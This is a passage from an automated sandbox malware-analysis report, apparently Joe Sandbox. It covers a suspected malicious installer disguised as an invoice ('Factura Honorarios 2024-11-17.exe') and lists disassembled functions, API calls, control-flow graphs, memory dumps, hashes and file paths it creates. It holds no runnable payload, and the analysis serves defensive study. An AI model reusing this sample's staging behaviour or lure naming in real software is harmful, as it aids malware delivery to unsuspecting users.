                                                                                                                                  • lstrlenW.KERNEL32(0040324F,Skipped: C:\Users\user\AppData\Local\Temp\nsg8E1D.tmp\System.dll,00000000,00410EA0,004030B0,?,?,?,?,?,?,?,?,?,0040324F,00000000), ref: 00405334
                                                                                                                                  • lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsg8E1D.tmp\System.dll,0040324F,0040324F,Skipped: C:\Users\user\AppData\Local\Temp\nsg8E1D.tmp\System.dll,00000000,00410EA0,004030B0), ref: 00405347
                                                                                                                                  • SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsg8E1D.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsg8E1D.tmp\System.dll), ref: 00405359
                                                                                                                                  • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040537F
                                                                                                                                  • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405399
                                                                                                                                  • SendMessageW.USER32(?,00001013,?,00000000), ref: 004053A7
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1871642625.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1871626525.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871665427.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871819266.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                                                                                  • String ID: Skipped: C:\Users\user\AppData\Local\Temp\nsg8E1D.tmp\System.dll
                                                                                                                                  • API String ID: 2531174081-1121547751
                                                                                                                                  • Opcode ID: f62b684c0e6f289dd6bb465d0f12a75b041ce70bd46b314235ddfc122f96f8a0
                                                                                                                                  • Instruction ID: 5cbdc996bc9841dedcc8c590482a37e7ed43af3164ff52369f5afd8429117419
                                                                                                                                  • Opcode Fuzzy Hash: f62b684c0e6f289dd6bb465d0f12a75b041ce70bd46b314235ddfc122f96f8a0
                                                                                                                                  • Instruction Fuzzy Hash: FA219D71900618BBDB11AF96DD849CFBF78EF45354F50807AF904B62A0C3B94A50CFA8
                                                                                                                                  Function 004065EE Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36libraryCOMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 856 4065ee-40660e GetSystemDirectoryW 857 406610 856->857 858 406612-406614 856->858 857->858 859 406625-406627 858->859 860 406616-40661f 858->860 861 406628-40665b wsprintfW LoadLibraryExW 859->861 860->859 862 406621-406623 860->862 862->861
                                                                                                                                  APIs
                                                                                                                                  • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406605
                                                                                                                                  • wsprintfW.USER32 ref: 00406640
                                                                                                                                  • LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 00406654
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1871642625.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1871626525.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871665427.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871819266.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                                                                                  • String ID: %s%S.dll$UXTHEME$\
                                                                                                                                  • API String ID: 2200240437-1946221925
                                                                                                                                  • Opcode ID: fcd04411c5a1f64f7e9219edfc5ac0d332aa1f587fd7b062781a7321f30925af
                                                                                                                                  • Instruction ID: 0a3accc906e0554885a7c349f3439cc1632e9825758041c21a8046ddc9b1cf8d
                                                                                                                                  • Opcode Fuzzy Hash: fcd04411c5a1f64f7e9219edfc5ac0d332aa1f587fd7b062781a7321f30925af
                                                                                                                                  • Instruction Fuzzy Hash: 28F0217050111967CB10EB64DD0DFAB3B6CA700304F10487AA547F10D1EBBDDB64CB98
                                                                                                                                  Function 00403116 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 155COMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 863 403116-40312d 864 403136-40313e 863->864 865 40312f 863->865 866 403140 864->866 867 403145-40314a 864->867 865->864 866->867 868 40315a-403167 call 4032fb 867->868 869 40314c-403155 call 403311 867->869 873 4032b2 868->873 874 40316d-403171 868->874 869->868 877 4032b4-4032b5 873->877 875 403177-403197 GetTickCount call 4067bf 874->875 876 40329b-40329d 874->876 887 4032f1 875->887 889 40319d-4031a5 875->889 878 4032e6-4032ea 876->878 879 40329f-4032a2 876->879 881 4032f4-4032f8 877->881 882 4032b7-4032bd 878->882 883 4032ec 878->883 884 4032a4 879->884 885 4032a7-4032b0 call 4032fb 879->885 890 4032c2-4032d0 call 4032fb 882->890 891 4032bf 882->891 883->887 884->885 885->873 897 4032ee 885->897 887->881 894 4031a7 889->894 895 4031aa-4031b8 call 4032fb 889->895 890->873 899 4032d2-4032de call 405e2c 890->899 891->890 894->895 895->873 902 4031be-4031c7 895->902 897->887 906 4032e0-4032e3 899->906 907 403297-403299 899->907 903 4031cd-4031ea call 4067df 902->903 909 4031f0-403207 GetTickCount 903->909 910 403293-403295 903->910 906->878 907->877 911 403252-403254 909->911 912 403209-403211 909->912 910->877 915 403256-40325a 911->915 916 403287-40328b 911->916 913 403213-403217 912->913 914 403219-40324a MulDiv wsprintfW call 4052ec 912->914 913->911 913->914 922 40324f 914->922 919 40325c-403261 call 405e2c 915->919 920 40326f-403275 915->920 916->889 917 403291 916->917 917->887 925 403266-403268 919->925 921 40327b-40327f 920->921 921->903 924 403285 921->924 922->911 924->887 925->907 926 40326a-40326d 925->926 926->921
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1871642625.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1871626525.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871665427.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871819266.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CountTick$wsprintf
                                                                                                                                  • String ID: ... %d%%
                                                                                                                                  • API String ID: 551687249-2449383134
                                                                                                                                  • Opcode ID: 557a710098fc5fea4fad4b99a5744db3c4a6bc79f6805394010e30fec0e2fa40
                                                                                                                                  • Instruction ID: eb9965c025c0ad248c1811abffb3300191da1be904cace2ded6344ef59bce26d
                                                                                                                                  • Opcode Fuzzy Hash: 557a710098fc5fea4fad4b99a5744db3c4a6bc79f6805394010e30fec0e2fa40
                                                                                                                                  • Instruction Fuzzy Hash: 97516B71900219EBCB10DF65EA44A9F3BA8AF44766F1441BFFC04B72C1C7789E518BA9
                                                                                                                                  Function 004057BB Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 39COMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 927 4057bb-405806 CreateDirectoryW 928 405808-40580a 927->928 929 40580c-405819 GetLastError 927->929 930 405833-405835 928->930 929->930 931 40581b-40582f SetFileSecurityW 929->931 931->928 932 405831 GetLastError 931->932 932->930
                                                                                                                                  APIs
                                                                                                                                  • CreateDirectoryW.KERNELBASE(?,?,00000000), ref: 004057FE
                                                                                                                                  • GetLastError.KERNEL32 ref: 00405812
                                                                                                                                  • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 00405827
                                                                                                                                  • GetLastError.KERNEL32 ref: 00405831
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1871642625.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1871626525.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871665427.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871819266.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                                                                                                  • String ID: C:\Users\user\Desktop
                                                                                                                                  • API String ID: 3449924974-1876063424
                                                                                                                                  • Opcode ID: c7775b55854fc79259119bfc4daa9494171cd7cf58f96f816c013ac7f64a11dc
                                                                                                                                  • Instruction ID: bfe53add753044f5513d0e7cef191a671c10544bda2f5855e72e4bfb682ac43c
                                                                                                                                  • Opcode Fuzzy Hash: c7775b55854fc79259119bfc4daa9494171cd7cf58f96f816c013ac7f64a11dc
                                                                                                                                  • Instruction Fuzzy Hash: 14011A72D00619DADF009FA4C9447EFBBB4EF14355F00843AD945B6281DB789658CFE9
                                                                                                                                  Function 00405DA9 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 37COMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 933 405da9-405db5 934 405db6-405dea GetTickCount GetTempFileNameW 933->934 935 405df9-405dfb 934->935 936 405dec-405dee 934->936 938 405df3-405df6 935->938 936->934 937 405df0 936->937 937->938
                                                                                                                                  APIs
                                                                                                                                  • GetTickCount.KERNEL32 ref: 00405DC7
                                                                                                                                  • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,"C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe",00403357,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,75573420,004035A3), ref: 00405DE2
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1871642625.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1871626525.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871665427.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871819266.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CountFileNameTempTick
                                                                                                                                  • String ID: "C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe"$C:\Users\user\AppData\Local\Temp\$nsa
                                                                                                                                  • API String ID: 1716503409-2339286198
                                                                                                                                  • Opcode ID: 579317ece081e1c49d3b274132234632dc0f80c8b4471fc5797a0d742f25062f
                                                                                                                                  • Instruction ID: 8d675393d4be3a1a13ee7cec111603dd999094634a9ab4ae6aafa5463bef85a0
                                                                                                                                  • Opcode Fuzzy Hash: 579317ece081e1c49d3b274132234632dc0f80c8b4471fc5797a0d742f25062f
                                                                                                                                  • Instruction Fuzzy Hash: 9BF03076A00304FBEB00DF69DD09E9BB7A9EF95710F11803BE900E7250E6B09954DB64
                                                                                                                                  Function 6FF4177B Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 120COMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 939 6ff4177b-6ff417ba call 6ff41b63 943 6ff417c0-6ff417c4 939->943 944 6ff418da-6ff418dc 939->944 945 6ff417c6-6ff417cc call 6ff42356 943->945 946 6ff417cd-6ff417da call 6ff42398 943->946 945->946 951 6ff417dc-6ff417e1 946->951 952 6ff4180a-6ff41811 946->952 955 6ff417e3-6ff417e4 951->955 956 6ff417fc-6ff417ff 951->956 953 6ff41831-6ff41835 952->953 954 6ff41813-6ff4182f call 6ff4256d call 6ff415b4 call 6ff41272 GlobalFree 952->954 961 6ff41837-6ff41880 call 6ff415c6 call 6ff4256d 953->961 962 6ff41882-6ff41888 call 6ff4256d 953->962 978 6ff41889-6ff4188d 954->978 959 6ff417e6-6ff417e7 955->959 960 6ff417ec-6ff417ed call 6ff42a74 955->960 956->952 957 6ff41801-6ff41802 call 6ff42d2f 956->957 971 6ff41807 957->971 966 6ff417f4-6ff417fa call 6ff42728 959->966 967 6ff417e9-6ff417ea 959->967 974 6ff417f2 960->974 961->978 962->978 977 6ff41809 966->977 967->952 967->960 971->977 974->971 977->952 982 6ff4188f-6ff4189d call 6ff42530 978->982 983 6ff418ca-6ff418d1 978->983 989 6ff418b5-6ff418bc 982->989 990 6ff4189f-6ff418a2 982->990 983->944 985 6ff418d3-6ff418d4 GlobalFree 983->985 985->944 989->983 992 6ff418be-6ff418c9 call 6ff4153d 989->992 990->989 991 6ff418a4-6ff418ac 990->991 991->989 993 6ff418ae-6ff418af FreeLibrary 991->993 992->983 993->989
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 6FF41B63: GlobalFree.KERNEL32(?), ref: 6FF41DB6
                                                                                                                                    • Part of subcall function 6FF41B63: GlobalFree.KERNEL32(?), ref: 6FF41DBB
                                                                                                                                    • Part of subcall function 6FF41B63: GlobalFree.KERNEL32(?), ref: 6FF41DC0
                                                                                                                                  • GlobalFree.KERNEL32(00000000), ref: 6FF41829
                                                                                                                                  • FreeLibrary.KERNEL32(?), ref: 6FF418AF
                                                                                                                                  • GlobalFree.KERNEL32(00000000), ref: 6FF418D4
                                                                                                                                    • Part of subcall function 6FF42356: GlobalAlloc.KERNEL32(00000040,?), ref: 6FF42387
                                                                                                                                    • Part of subcall function 6FF42728: GlobalAlloc.KERNEL32(00000040,00000000,?,?,00000000,?,?,?,6FF417FA,00000000), ref: 6FF427F8
                                                                                                                                    • Part of subcall function 6FF415C6: lstrcpyW.KERNEL32(?,6FF44020,00000000,6FF415C3,?,00000000,6FF41753,00000000), ref: 6FF415DC
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1913284405.000000006FF41000.00000020.00000001.01000000.00000004.sdmp, Offset: 6FF40000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1913259561.000000006FF40000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1913297381.000000006FF43000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1913309870.000000006FF45000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_6ff40000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Global$Free$Alloc$Librarylstrcpy
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1791698881-3916222277
                                                                                                                                  • Opcode ID: a5a3b8a03037d4ad183485a3e72e5bf7cdffdc30dd13a797198874f488f4cab5
                                                                                                                                  • Instruction ID: 1883acd149327ef80d500cfbe14ae5c09bda48c8294b2a0f78f5bc8f139054d8
                                                                                                                                  • Opcode Fuzzy Hash: a5a3b8a03037d4ad183485a3e72e5bf7cdffdc30dd13a797198874f488f4cab5
                                                                                                                                  • Instruction Fuzzy Hash: C241E4724003049ADF129F74D884BD63FA8BF01315F044576ED2AEE2D7DBB991A8CB64
                                                                                                                                  Function 004015C1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00405C04: CharNextW.USER32(?,?,00425EF0,?,00405C78,00425EF0,00425EF0,?,?,75573420,004059B6,?,C:\Users\user\AppData\Local\Temp\,75573420,00000000), ref: 00405C12
                                                                                                                                    • Part of subcall function 00405C04: CharNextW.USER32(00000000), ref: 00405C17
                                                                                                                                    • Part of subcall function 00405C04: CharNextW.USER32(00000000), ref: 00405C2F
                                                                                                                                  • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161A
                                                                                                                                    • Part of subcall function 004057BB: CreateDirectoryW.KERNELBASE(?,?,00000000), ref: 004057FE
                                                                                                                                  • SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\rigsfaellesskab,?,00000000,000000F0), ref: 0040164D
                                                                                                                                  Strings
                                                                                                                                  • C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\rigsfaellesskab, xrefs: 00401640
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1871642625.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1871626525.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871665427.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871819266.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                                                                                                  • String ID: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\rigsfaellesskab
                                                                                                                                  • API String ID: 1892508949-4138664628
                                                                                                                                  • Opcode ID: f016b00615f9d65ee3458270e5d489e8c8114c99f0c06642e4f3a09aec43fc39
                                                                                                                                  • Instruction ID: cdbb32f604e1e97b4505581c5a6dce2e2be8be56f1f537164db10111f90f244e
                                                                                                                                  • Opcode Fuzzy Hash: f016b00615f9d65ee3458270e5d489e8c8114c99f0c06642e4f3a09aec43fc39
                                                                                                                                  • Instruction Fuzzy Hash: 5911D031504501EBCF30BFA4CD4199F36A0EF14329B29493BFA45B22F1DB3E49519A5E
                                                                                                                                  Function 00406DC3 Relevance: 5.2, APIs: 4, Instructions: 236COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1871642625.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1871626525.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871665427.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871819266.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 2379a6b80c2bc0c9d89d3ff48ecf146a73f88eb31b703b146685e5d0c657cb03
                                                                                                                                  • Instruction ID: 28e39518df3801c38e3280a2e83f64e055c3b15caa2ea9a1a3761292ca1e3da9
                                                                                                                                  • Opcode Fuzzy Hash: 2379a6b80c2bc0c9d89d3ff48ecf146a73f88eb31b703b146685e5d0c657cb03
                                                                                                                                  • Instruction Fuzzy Hash: F9A15371E04229CBDB28CFA8C8547ADBBB1FF44305F10816ED456BB281C7786A86DF45
                                                                                                                                  Function 00406FC4 Relevance: 5.2, APIs: 4, Instructions: 208COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1871642625.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1871626525.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871665427.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871819266.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: a97e96a70b1528884494d5a2455c9c9c8bf64013d0c9d0d58a0b179d1d34f865
                                                                                                                                  • Instruction ID: 90999bc76b255a60827136b2fd47affe8781ac3d45706895e3c6f95813f0c94e
